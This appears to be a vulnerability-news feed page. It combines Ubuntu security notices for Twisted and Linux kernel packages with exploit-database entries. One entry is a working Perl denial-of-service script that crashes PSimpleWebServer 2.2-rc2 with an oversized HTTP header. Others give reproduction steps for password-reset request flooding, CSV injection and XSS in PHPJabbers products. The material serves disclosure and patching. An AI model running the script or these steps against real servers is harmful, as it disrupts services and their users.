Ubuntu Security Notice 6575-1 - It was discovered that Twisted incorrectly escaped host headers in certain 404 responses. A remote attacker could possibly use this issue to perform HTML and script injection attacks. This issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. It was discovered that Twisted incorrectly handled response order when processing multiple HTTP requests. A remote attacker could possibly use this issue to delay responses and manipulate the responses of second requests.

==========================================================================  
Ubuntu Security Notice USN-6575-1  
January 10, 2024

twisted vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Twisted.

Software Description:  
- twisted: Event-based framework for internet applications

Details:

It was discovered that Twisted incorrectly escaped host headers in certain  
404 responses. A remote attacker could possibly use this issue to perform  
HTML and script injection attacks. This issue only affected Ubuntu 20.04  
LTS and Ubuntu 22.04 LTS. (CVE-2022-39348)

It was discovered that Twisted incorrectly handled response order when  
processing multiple HTTP requests. A remote attacker could possibly use  
this issue to delay responses and manipulate the responses of second  
requests. (CVE-2023-46137)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   python3-twisted                 22.4.0-4ubuntu0.23.10.1

Ubuntu 23.04:  
   python3-twisted                 22.4.0-4ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   python3-twisted                 22.1.0-2ubuntu2.4

Ubuntu 20.04 LTS:  
   python3-twisted                 18.9.0-11ubuntu0.20.04.3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6575-1  
   CVE-2022-39348, CVE-2023-46137

Package Information:  
   https://launchpad.net/ubuntu/+source/twisted/22.4.0-4ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/twisted/22.4.0-4ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/twisted/22.1.0-2ubuntu2.4  
   https://launchpad.net/ubuntu/+source/twisted/18.9.0-11ubuntu0.20.04.3

Ubuntu Security Notice USN-6575-1

SimpleWebServer version 2.2-rc2 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 11 january 2024  
# Vendor Homepage:  http://www.pmx.it/  
# Download to demo: https://drive.google.com/file/d/1tAK7dKl3yBPQSeo5Tid4p2FETyh8Zjvs/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: PSimpleWebServer 2.2-rc2   
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=YFfBuWnHeQY

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data to web server.  
#The following request sends a large amount of data to the web server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

print "\t    ==> Connecting to webserver... \n\n";  
sleep(1);

our $exploit = "\x41"x2014;

$exploit     = "x\41"x2104;

if ($socket = IO::Socket::INET->new  
     (PeerAddr => $ip,  
      PeerPort => $port,  
      Proto => "TCP"))  
{  
        $header =  
        "GET / HTTP/1.1\r\n".  
        "Host: ".$ip." \r\n".  
        "Connection:".$exploit."\r\n";  
        print $socket $header."\r\n";  
        sleep(1);  
        close($socket);  
}

 else  
{  
    print "[-] Connection to $ip failed!\n";  
    exit;  
}

              print "\t    ==> Done! Exploited!";  
   sub intro {  
      print q {

                        ,,__  
              ..  ..   / o._)           
             /--'/--\  \-'||    
            /        \_/ / |    
          .'\  \__\  __.'.'     
            )\ |  )\ |        
           // \\ // \\  
          ||_  \\|_  \\_  
          '--' '--'' '--'  

                [+] SimpleWebServer 2.2-rc2 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "\n\tUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

SimpleWebServer 2.2-rc2 Denial Of Service

PHPJabbers Event Ticketing System version 1.0 suffers from a missing rate limiting vulnerability.

    # Exploit Title: PHPJabbers Event Ticketing System v1.0 - No Rate Limit# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51339Descriptions:A lack of rate limiting in the "Forgot Email" feature of PHPJabbersEvent Ticketing System v1.0 allows attackers to send an excessiveamount of reset requests for a legitimate user, leading to a possibleDenial of Service (DoS) via a large amount of generated e-mailmessages.Steps to Reproduce:1. Visit this URLhttps://demo.phpjabbers.com/1704798072_893/index.php?controller=pjAdmin&action=pjActionIndex2. Now use the account mail that is already registered on this website.3. Capture request data using burp suite and send it to Intruder Tab4. Configure Intruder and Start Attack5. Check your email.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51339)

PHPJabbers Event Ticketing System 1.0 Missing Rate Limiting

PHPJabbers Meeting Room Booking System version 1.0 suffers from a CSV injection vulnerability.

    # Exploit Title: PHPJabbers Meeting Room Booking System v1.0 - CSV Injection# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11# CVE-2023-51336Descriptions:PHPJabbers Meeting Room Booking System v1.0 is vulnerable to CSVinjection vulnerability which allows an attacker to execute remotecode. The vulnerability exists due to insufficient input validation onthe Unique ID field in the Reservations list that is used to constructa CSV file.Steps to Reproduce:1. Login your panel.2. Go to Options Menu then click Language then click Labels section.3. Now use CSV Injection Payload in any field and go to Import/Export.4. Now click export and open your system.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51336)

PHPJabbers Meeting Room Booking System 1.0 CSV Injection

PHPJabbers Meeting Room Booking System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

    # Exploit Title: PHPJabbers Meeting Room Booking System v1.0 -Multiple Stored XSS# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51338Descriptions:PHPJabbers Meeting Room Booking System v1.0 is vulnerable to MultipleStored Cross-Site Scripting. Multiple Stored XSS is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "title, name".3. Go to System Users Menu then click add user.4. Then use any XSS Payload in "Name" input field and Save.5. You will see xss popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51338)

PHPJabbers Meeting Room Booking System 1.0 Cross Site Scripting

PHPJabbers Event Ticketing System version 1.0 suffers from cross site scripting and html injection vulnerabilities.

    # Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple HTML Injection# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51303Descriptions:PHPJabbers Event Ticketing System v1.0 is vulnerable to Multiple HTMLInjection. HTML injection, also known as HTML code injection orcross-site scripting (XSS), is a web security vulnerability thatallows an attacker to inject malicious code into a web page that isthen viewed by other users. This can lead to various attacks, such asstealing sensitive information, session hijacking, defacement ofwebsites, or delivering malware to users.Parameters: "lid, name, plugin_sms_api_key, plugin_sms_country_code,title, plugin_sms_api_key, title".Steps to Reproduce:1. Login your panel.2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51303)# Exploit Title: PHPJabbers Event Ticketing System v1.0 - Multiple Stored XSS# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51306Descriptions:PHPJabbers Event Ticketing System v1.0 is vulnerable to MultipleStored Cross-Site Scripting. Multiple Stored XSS is a type of securityvulnerability that occurs when an application or website allows anattacker to inject malicious scripts into the content that ispermanently stored on the server.Steps to Reproduce:1. Login your panel.2. Vulnerable parameters are "name, title".3. Go to System Users then click Add User.4. Then use any XSS Payload in "Name" input field and Save.5. You will see xss popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51306)# Exploit Title: PHPJabbers Event Ticketing System v1.0 - Reflected XSS# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51337Descriptions:Reflected cross-site scripting (XSS) vulnerability exists in indexpage "lid" parameter of PHPJabbers Event Ticketing System v1.0 thatallows attackers to execute arbitrary web scripts or HTML via acrafted payload injected into the Website login page parameter.Steps to Reproduce:1. Visit main url2. Now use XSS Payload in "lid" parameter.3. You will see xss popup.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51337)

PHPJabbers Event Ticketing System 1.0 Cross Site Scripting / HTML Injection

Ubuntu Security Notice 6576-1 - Lonial Con discovered that the netfilter subsystem in the Linux kernel did not properly handle an expired catchall element in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6576-1January 10, 2024linux-oem-6.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-oem-6.1: Linux kernel for OEM systemsDetails:Lonial Con discovered that the netfilter subsystem in the Linux kernel didnot properly handle an expired catchall element in some situations, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-6.1.0-1028-oem      6.1.0-1028.28   linux-image-oem-22.04           6.1.0.1028.29   linux-image-oem-22.04a          6.1.0.1028.29   linux-image-oem-22.04b          6.1.0.1028.29   linux-image-oem-22.04c          6.1.0.1028.29After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6576-1   CVE-2023-6111Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-6.1/6.1.0-1028.28

Ubuntu Security Notice USN-6576-1

Ubuntu Security Notice 6549-5 - It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel did not properly initialize a policy data structure, leading to an out-of-bounds vulnerability. A local privileged attacker could use this to cause a denial of service or possibly expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6549-5  
January 10, 2024

linux-gcp-5.15, linux-intel-iotg-5.15 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-intel-iotg-5.15: Linux kernel for Intel IoT platforms

Details:

It was discovered that the USB subsystem in the Linux kernel contained a  
race condition while handling device descriptors in certain situations,  
leading to a out-of-bounds read vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-37453)

Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel did not properly initialize a policy data structure, leading  
to an out-of-bounds vulnerability. A local privileged attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information (kernel memory). (CVE-2023-3773)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate some attributes passed from userspace. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly expose sensitive information (kernel memory). (CVE-2023-39189)

Sunjoo Park discovered that the netfilter subsystem in the Linux kernel did  
not properly validate u32 packets content, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39192)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate SCTP data, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39193)

Lucas Leong discovered that the Netlink Transformation (XFRM) subsystem in  
the Linux kernel did not properly handle state filters, leading to an out-  
of-bounds read vulnerability. A privileged local attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-39194)

It was discovered that a race condition existed in QXL virtual GPU driver  
in the Linux kernel, leading to a use after free vulnerability. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-39198)

Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did  
not properly handle socket buffers (skb) when performing IP routing in  
certain circumstances, leading to a null pointer dereference vulnerability.  
A privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-42754)

Jason Wang discovered that the virtio ring implementation in the Linux  
kernel did not properly handle iov buffers in some situations. A local  
attacker in a guest VM could use this to cause a denial of service (host  
system crash). (CVE-2023-5158)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel  
did not properly handle queue initialization failures in certain  
situations, leading to a use-after-free vulnerability. A remote attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5178)

Budimir Markovic discovered that the perf subsystem in the Linux kernel did  
not properly handle event groups, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-5717)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1046-intel-iotg  5.15.0-1046.52~20.04.1  
   linux-image-5.15.0-1048-gcp     5.15.0-1048.56~20.04.1  
   linux-image-gcp                 5.15.0.1048.56~20.04.1  
   linux-image-intel               5.15.0.1046.52~20.04.36  
   linux-image-intel-iotg          5.15.0.1046.52~20.04.36

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6549-5  
   https://ubuntu.com/security/notices/USN-6549-1  
   CVE-2023-37453, CVE-2023-3773, CVE-2023-39189, CVE-2023-39192,  
   CVE-2023-39193, CVE-2023-39194, CVE-2023-39198, CVE-2023-42754,  
   CVE-2023-5158, CVE-2023-5178, CVE-2023-5717

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1048.56~20.04.1

 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1046.52~20.04.1

Ubuntu Security Notice USN-6549-5

Ubuntu Security Notice 6548-5 - It was discovered that Spectre-BHB mitigations were missing for Ampere processors. A local attacker could potentially use this to expose sensitive information. It was discovered that the USB subsystem in the Linux kernel contained a race condition while handling device descriptors in certain situations, leading to a out-of-bounds read vulnerability. A local attacker could possibly use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6548-5  
January 10, 2024

linux-iot vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-iot: Linux kernel for IoT platforms

Details:

It was discovered that Spectre-BHB mitigations were missing for Ampere  
processors. A local attacker could potentially use this to expose sensitive  
information. (CVE-2023-3006)

It was discovered that the USB subsystem in the Linux kernel contained a  
race condition while handling device descriptors in certain situations,  
leading to a out-of-bounds read vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash).  
(CVE-2023-37453)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate some attributes passed from userspace. A local  
attacker could use this to cause a denial of service (system crash) or  
possibly expose sensitive information (kernel memory). (CVE-2023-39189)

Sunjoo Park discovered that the netfilter subsystem in the Linux kernel did  
not properly validate u32 packets content, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39192)

Lucas Leong discovered that the netfilter subsystem in the Linux kernel did  
not properly validate SCTP data, leading to an out-of-bounds read  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-39193)

Lucas Leong discovered that the Netlink Transformation (XFRM) subsystem in  
the Linux kernel did not properly handle state filters, leading to an out-  
of-bounds read vulnerability. A privileged local attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-39194)

Kyle Zeng discovered that the IPv4 implementation in the Linux kernel did  
not properly handle socket buffers (skb) when performing IP routing in  
certain circumstances, leading to a null pointer dereference vulnerability.  
A privileged attacker could use this to cause a denial of service (system  
crash). (CVE-2023-42754)

Alon Zahavi discovered that the NVMe-oF/TCP subsystem in the Linux kernel  
did not properly handle queue initialization failures in certain  
situations, leading to a use-after-free vulnerability. A remote attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-5178)

Budimir Markovic discovered that the perf subsystem in the Linux kernel did  
not properly handle event groups, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-5717)

It was discovered that the TLS subsystem in the Linux kernel did not  
properly perform cryptographic operations in some situations, leading to a  
null pointer dereference vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-6176)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1028-iot      5.4.0-1028.29

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6548-5  
   https://ubuntu.com/security/notices/USN-6548-1  
   CVE-2023-3006, CVE-2023-37453, CVE-2023-39189, CVE-2023-39192,  
   CVE-2023-39193, CVE-2023-39194, CVE-2023-42754, CVE-2023-5178,  
   CVE-2023-5717, CVE-2023-6176

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1028.29

Ubuntu Security Notice USN-6548-5

PHPJabbers Cinema Booking System version 1.0 suffers from a missing rate limiting vulnerability.

    # Exploit Title: PHPJabbers Cinema Booking System v1.0 - No Rate Limit# Date: 19/12/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/cinema-booking-system/#sectionDemo# Version: v1.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-51334Descriptions:A lack of rate limiting in the "Login Section, Forgot Email" featureof PHPJabbers Cinema Booking System v1.0 allows attackers to send anexcessive amount of reset requests for a legitimate user, leading to apossible Denial of Service (DoS) via a large amount of generatede-mail messages.Steps to Reproduce:1. Visit this URLhttps://demo.phpjabbers.com/1704804809_816/index.php?controller=pjAdmin&action=pjActionIndex2. Now use the account mail that is already registered on this website.3. Capture request data using burp suite and send it to Intruder Tab4. Configure Intruder and Start Attack5. Check your email.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-51334)

Tag

#vulnerability